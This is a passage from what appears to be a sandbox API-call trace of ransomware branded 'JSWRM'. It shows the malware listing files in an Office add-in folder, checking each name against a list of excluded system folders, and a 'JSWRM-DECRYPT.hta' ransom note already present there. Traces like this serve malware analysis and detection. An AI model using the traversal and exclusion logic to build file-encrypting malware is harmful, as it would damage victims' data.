returned 0x23ddc8 [0125.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\jswrm-decrypt.hta")) returned 0x20 [0125.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0125.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.284] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4156961d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232240 [0125.284] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.284] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4156961d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.284] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6c6bda4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4658, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.284] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.285] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0125.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0125.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.285] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4156961d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4156961d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4156961d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.285] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0125.286] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb86af90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb86af90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb86af90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.286] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.287] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0125.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.287] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4928, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.287] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.288] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0125.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0125.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.288] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15e92299, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15eb84b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50264, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sk.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2=".") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="..") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="...") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="windows") returned -1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="recovery") returned -1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="perflogs") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="documents and settings") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="system volume information") returned -1 [0125.288] lstrcmpiW (lpString1="PowerViewRes.sk.xap", lpString2="msocache") returned 1 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sk.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sk.xap", lpUsedDefaultChar=0x0) returned 19 [0125.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sk.xap", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sk.xap", lpUsedDefaultChar=0x0) returned 19 [0125.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0125.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel 